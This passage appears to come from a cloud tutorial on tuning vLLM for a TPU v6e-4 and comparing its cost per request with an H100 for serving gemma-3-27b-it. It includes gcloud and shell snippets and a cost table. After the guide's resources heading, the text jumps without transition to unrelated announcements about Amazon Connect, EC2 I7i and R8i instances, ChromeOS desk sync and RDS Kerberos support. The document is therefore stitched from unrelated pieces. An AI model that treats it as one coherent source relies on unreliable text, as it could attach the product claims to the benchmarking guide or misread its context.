TPU v6e (aka Trillium)
Let’s do the same optimization process for TPU now. You will find that vLLM has a robust ecosystem for supporting TPU-based inference and that there is little difference between how we execute our benchmarking script for GPU and TPU.
First we’ll need to launch and configure networking for our TPU instance – in this case we can use Queued Resources. Back in our Cloud Shell, use the following command to deploy a v6e-4 instance. Be sure to select a zone where v6e is available.
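A Queued Resources request for a v6e-4 typically looks something like this sketch; the resource names are placeholders and the runtime version should come from the current TPU documentation.
```
# Request a v6e-4 via Queued Resources (names are placeholders).
gcloud compute tpus queued-resources create <queued-resource-id> \
  --node-id <your-tpu-name> \
  --project $PROJECT \
  --zone $ZONE \
  --accelerator-type v6e-4 \
  --runtime-version <v6e-runtime-version>
```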
```
# Monitor creation
gcloud compute tpus queued-resources list --zone $ZONE --project $PROJECT
```
Wait for the TPU VM to become active (status will update from PROVISIONING to ACTIVE). This might take some time depending on resource availability in the selected zone.
SSH directly into the instance with the following command:
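A minimal sketch, assuming the standard TPU VM SSH helper and a placeholder resource name:
```
# SSH into the first worker of the v6e-4 TPU VM (resource name is a placeholder).
gcloud compute tpus tpu-vm ssh <your-tpu-name> \
  --zone $ZONE \
  --project $PROJECT \
  --worker=0
```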
Again, we will need to install a dependency, provide our HF_TOKEN and update our auto-tune script as we did above with the H100.
```
# Head to main working directory
cd benchmarks/auto_tune/

# install required library
apt-get install bc

# Provide HF_TOKEN
export HF_TOKEN=XXXXXXXXXXXXXXXXXXXXX

# update auto_tune.sh with your preferred script editor and launch the auto tuner
nano auto_tune.sh
```
We will want to make the following updates to the vllm/benchmarks/auto_tune.sh file:
As our auto_tune.sh executes, we determine the largest possible gpu_utilization value the server can run with and then cycle through the different num_batched_tokens parameters to find which is most efficient.
Troubleshooting Note: Starting a vLLM engine on TPU can take longer than on GPU due to a series of required compilation steps. In some cases this can exceed 10 minutes, and when that happens the auto_tune.sh script may kill the process. If this occurs, update the start_server() function so that the for loop sleeps for 30 seconds rather than 10 seconds, as shown here:
```
start_server() {

  ...

  for i in {1..60}; do
    RESPONSE=$(curl -s -X GET "http://0.0.0.0:8004/health" -w "%{http_code}" -o /dev/stdout)
    STATUS_CODE=$(echo "$RESPONSE" | tail -n 1)
    if [[ "$STATUS_CODE" -eq 200 ]]; then
      server_started=1
      break
    else
      sleep 10  # UPDATE TO 30 IF VLLM ENGINE START TAKES TOO LONG
    fi
  done
  if (( ! server_started )); then
    echo "server did not start within 10 minutes. Please check server log at $vllm_log."
    return 1
  else
    return 0
  fi
}
```
The outputs are printed as the program executes, and we can also find them in log files at $BASE/auto-benchmark/$TAG. We can see in these logs that our current configurations are still able to meet our latency requirement.
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 9
This is the final input from the script’s loop. It means your script determined that sending 9 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 10 req/s, the latency was too high.
e2el: 8423.40
This is the P99 latency that was measured when the server was being hit with 9 req/s. Since 8423.40 is less than 10,000, the script accepted this as a successful run.
throughput: 5.63
This is the actual, measured output. Even though you were sending requests at a rate of 9 per second, the server could only successfully process them at a rate of 5.63 per second.
Calculating Performance-Cost Ratio
Now that we have tuned and benchmarked our two primary accelerator candidates, we can bring the data together to make a final, cost-based decision. The goal is to find the most economical configuration that can meet our workload requirement of 100 requests per second while staying under our P99 end-to-end latency limit of 10,000 ms.
We will analyze the cost to meet our 100 req/s target using the best-performing configuration for both the H100 GPU and the TPU v6e.
NVIDIA H100 80GB (a3-highgpu-1g)
Measured Throughput: The benchmark showed a single H100 vLLM engine achieved a throughput of 4.17 req/s.
Instances Required: To meet our 100 req/s goal, we would need to run multiple instances. The calculation is 100 req/s ÷ 4.17 req/s per instance ≈ 23.98 instances.
Since we can’t provision a fraction of an instance, we must round up to 24 instances.
Estimated Cost: As of July 2025, the spot price for an a3-highgpu-1g machine type in us-central1 is approximately $2.25 per hour. The total hourly cost for our cluster would be: 24 instances × $2.25/hr = $54.00/hr
Note: We are choosing Spot instance pricing to keep the cost figures simple; this would not be a typical provisioning pattern for this type of workload.
Google Cloud TPU v6e (v6e-4)
Measured Throughput: The benchmark showed a single v6e-4 vLLM engine achieved a higher throughput of 5.63 req/s.
Instances Required: We perform the same calculation for the TPU cluster: 100 req/s ÷ 5.63 req/s per instance ≈ 17.76 instances.
Again, we must round up to 18 instances to strictly meet the 100 req/s requirement.
Estimated Cost: As of July 2025, the spot price for a v6e-4 queued resource in us-central1 is approximately $0.56 per chip per hour. The total hourly cost for this cluster would be:
18 instances × 4 chips x $0.56/hr = $40.32/hr
Conclusion: The Most Cost-Effective Choice
Let’s summarize our findings in a table to make the comparison clear.
| Metric | H100 (a3-highgpu-1g) | TPU (v6e-4) |
| --- | --- | --- |
| Throughput per Instance | 4.17 req/s | 5.63 req/s |
| Instances Needed (100 req/s) | 24 | 18 |
| Spot Instance Cost Per Hour | $2.25 / hour | $0.56 x 4 chips = $2.24 / hour |
| Spot Cost Total | $54.00 / hour | $40.32 / hour |
| Total Monthly Cost (730h) | ~$39,400 | ~$29,400 |
The results are definitive. For this specific workload (serving the gemma-3-27b-it model with long contexts), the v6e-4 configuration is the winner.
Not only does the v6e-4 instance provide higher throughput than the a3-highgpu-1g instance, but it does so at a significantly reduced cost. This translates to massive savings at higher scales.
Looking at the performance-per-dollar, the advantage is clear:
H100: 4.17 req/s ÷ $54.00/hr ≈ 0.08 req/s per dollar-hour
TPU v6e-4: 5.63 req/s ÷ $40.32/hr ≈ 0.14 req/s per dollar-hour
The v6e-4 configuration delivers almost twice the performance for every dollar spent, making it the clearly more cost-efficient choice for deploying this workload.
Final Reminder
This benchmarking and tuning process demonstrates the critical importance of evaluating different hardware options to find the optimal balance of performance and cost for your specific AI workload. We need to keep the following in mind when sizing these workloads:
If our workload changed (e.g., input length, output length, prefix-caching percentage, or our requirements) the outcome of this guide may be different – H100 could outperform v6e in several scenarios depending on the workload.
If we considered the other possible accelerators mentioned above, we may find a more cost effective approach that meets our requirements.
Finally, we covered a relatively small parameter space in our auto_tune.sh script for this example; a broader search might have found a configuration with even greater cost-savings potential.
Additional Resources
The following is a collection of additional resources to help you complete the guide and better understand the concepts described.
Amazon Connect now supports multi-user web, in-app and video calling, allowing multiple users to join the same session with an agent through a web browser or mobile application. Contact center agents can dynamically add participants during a live call or multiple participants can join a scheduled session with the same agent. Participants can engage in audio, video, and screen sharing for a fully collaborative experience.
This capability helps organizations support scenarios such as joint financial planning between spouses, partners and advisors, family medical consultations, or conversations that involve legal representatives, translators, or subject matter experts. With this capability, you can enable a rich, inclusive interaction across stakeholders in a single session, reducing friction and improving the quality of support for complex engagements.
These new features are available in all AWS regions where Amazon Connect is offered. To learn more, visit our product page or refer to our Admin Guide.
Amazon Web Services (AWS) announces the availability of high performance Storage Optimized Amazon EC2 I7i instances in the AWS Europe (Frankfurt, London), Asia Pacific (Malaysia, Sydney, Tokyo) regions. Powered by 5th generation Intel Xeon Scalable processors with an all-core turbo frequency of 3.2 GHz, these new instances deliver up to 23% better compute performance and more than 10% better price performance over previous generation I4i instances. Powered by 3rd generation AWS Nitro SSDs, I7i instances offer up to 45TB of NVMe storage with up to 50% better real-time storage performance, up to 50% lower storage I/O latency, and up to 60% lower storage I/O latency variability compared to I4i instances.
I7i instances offer the best compute and storage performance for x86-based storage optimized instances in Amazon EC2, ideal for I/O intensive and latency-sensitive workloads that demand very high random IOPS performance with real-time latency to access small to medium sized datasets (multi-TB). Additionally, the torn write prevention feature supports block sizes of up to 16KB, enabling customers to eliminate database performance bottlenecks.
I7i instances are available in eleven sizes – nine virtual sizes up to 48xlarge and two bare metal sizes – delivering up to 100Gbps of network bandwidth and 60Gbps of Amazon Elastic Block Store (EBS) bandwidth. To learn more, visit the I7i instances page.
For many workers, the frequent need to switch between devices can become cumbersome and disruptive. Otherwise simple tasks like logging in, reopening applications, and re-establishing your workspace end up consuming valuable time when done many times throughout the day. To address this challenge, we’re happy to introduce ChromeOS desk sync. This feature allows users to pick up right where they left off, moving from one ChromeOS device to another and seamlessly resuming their work. All open windows, tabs, applications, and user profile settings, along with authentication into different web services, are automatically transferred across devices.
Supporting frontline workers across industries
Across any industry, but especially frontline use cases like retail, hospitality, healthcare, and manufacturing, desk sync is a practical addition to support worker productivity.
In retail and hospitality, desk sync helps streamline operations during shift changes and improve customer interactions. Associates can pick up a new device at the start of their shift and immediately access their work, whether for inventory management, team communication, sales, and more, to better facilitate shift changes. Front desk staff can immediately access guest reservations, check-in systems, and service requests through any available device at the reception desk and continue right where they left off, making guest experiences smoother as well. This instant access allows employees to focus on providing a more consistent service, reducing wait times and improving customer experiences in the process. Even more, new employees may find it easier to adapt to shared device environments, as their familiar workspace can follow them and reduce setup times across devices.
Take a look at Village Hotel Club, who uses desk sync to share devices between hotel employees. At every hotel’s leisure center, two Chromebooks are available to share, which allows employees to take a ChromeOS device with them as they walk prospective members through their facilities, and then complete applications directly from that same device. This means employees can count on a reliable application experience across devices, without any disruptions to their workflows that could potentially impact customer service.
ChromeOS has revolutionized the way we work and revolutionized my role as an IT manager keeping data, people, and devices safe. It has also improved collaboration to the point that I couldn’t imagine how we could work effectively without them.
Dan Morley
Head of IT Infrastructure and Service Delivery, Village Hotels
In healthcare environments, desk sync optimizes essential tasks and enhances data consistency. Healthcare professionals can effortlessly move between patient rooms, nurse stations, or any other departments where devices can’t be moved around, accessing electronic health records, diagnostic tools, and communication platforms. Having access to consistent experiences to work across also helps support data privacy by reducing opportunities for vulnerabilities, human error, and data management issues. Overall, desk sync allows healthcare staff to spend less time worrying about login procedures and system navigation, and more time on direct patient care and critical tasks.
Within manufacturing use cases, desk sync contributes to a more continuous production flow and helps support team hand-offs. Manufacturing line workers and supervisors alike can easily move between workstations, accessing real-time data, quality control applications, and dashboards without significant delays. For shift changes, teams can more easily get up and running with desk sync, reducing disruptions in operations between shifts. Ultimately, reduced time spent on device setup will lead to more efficient time spent on the production floor and better operational efficiency as a result.
Future proof your frontline
ChromeOS desk sync is a powerful tool designed to meet the needs of modern work environments. By making it easier to transition between devices, it greatly reduces downtime and disruptions commonly associated with device switching. Whether in retail environments, hospitality, healthcare, or many other industries, desk sync provides consistency across devices, and empowers employees to focus more on their productivity and delivering exceptional customer experiences. If you’d like to get started with ChromeOS desk sync today, you can view our help center page to begin your configuration.
Interested in learning more about how ChromeOS can support shared device use cases? Visit our website.
AWS is announcing the general availability of new memory-optimized Amazon EC2 R8i and R8i-flex instances. These instances are powered by custom Intel Xeon 6 processors, available only on AWS, delivering the highest performance and fastest memory bandwidth among comparable Intel processors in the cloud. The R8i and R8i-flex instances offer up to 15% better price-performance, and 2.5x more memory bandwidth compared to previous generation Intel-based instances. They deliver 20% better performance than R7i instances, with even higher gains for specific workloads. They are up to 30% faster for PostgreSQL databases, up to 60% faster for NGINX web applications, and up to 40% faster for AI deep learning recommendation models compared to R7i.
R8i-flex, our first memory-optimized Flex instances, are the easiest way to get price performance benefits for a majority of memory-intensive workloads. They offer the most common sizes, from large to 16xlarge, and are a great first choice for applications that don’t fully utilize all compute resources.
R8i instances are a great choice for all memory-intensive workloads, especially for workloads that need the largest instance sizes or continuous high CPU usage. R8i instances offer 13 sizes including 2 bare metal and the new 96xlarge size for the largest applications. R8i instances are SAP-certified and deliver 142,100 aSAPS, the highest among all comparable machines in on-premises and cloud environments, delivering exceptional performance for mission-critical SAP workloads.
R8i and R8i-flex instances are available in the following AWS Regions: US East (N. Virginia), US East (Ohio), US West (Oregon), and Europe (Spain).
To get started, sign in to the AWS Management Console. Customers can purchase these instances via Savings Plans, On-Demand instances, and Spot instances. For more information about the new R8i and R8i-flex instances visit the AWS News blog.
Amazon Relational Database Service (Amazon RDS) for SQL Server now supports Kerberos authentication with self-managed Microsoft Active Directory (AD). With this launch, your applications can use Kerberos authentication to connect to your Amazon RDS for SQL Server instances joined to self-managed AD.
Previously, customers integrating Amazon RDS for SQL Server with Microsoft Active Directory had to use AWS Managed AD for Kerberos authentication. Now, customers can set up Kerberos authentication when integrating Amazon RDS for SQL Server with Microsoft AD without having to use AWS Managed AD. For customers who are migrating on-premises SQL Server databases to Amazon RDS for SQL Server, this feature simplifies migration by removing the requirement to adopt AWS Managed AD to use Kerberos authentication. Customers who use Amazon RDS for SQL Server with AWS Managed AD can continue to use their existing integration.
To join your Amazon RDS for SQL Server instance to a self-managed AD and setup Kerberos authentication, refer to the Amazon RDS for SQL Server User Guide. This feature is available in all AWS Commercial and AWS GovCloud (US) Regions.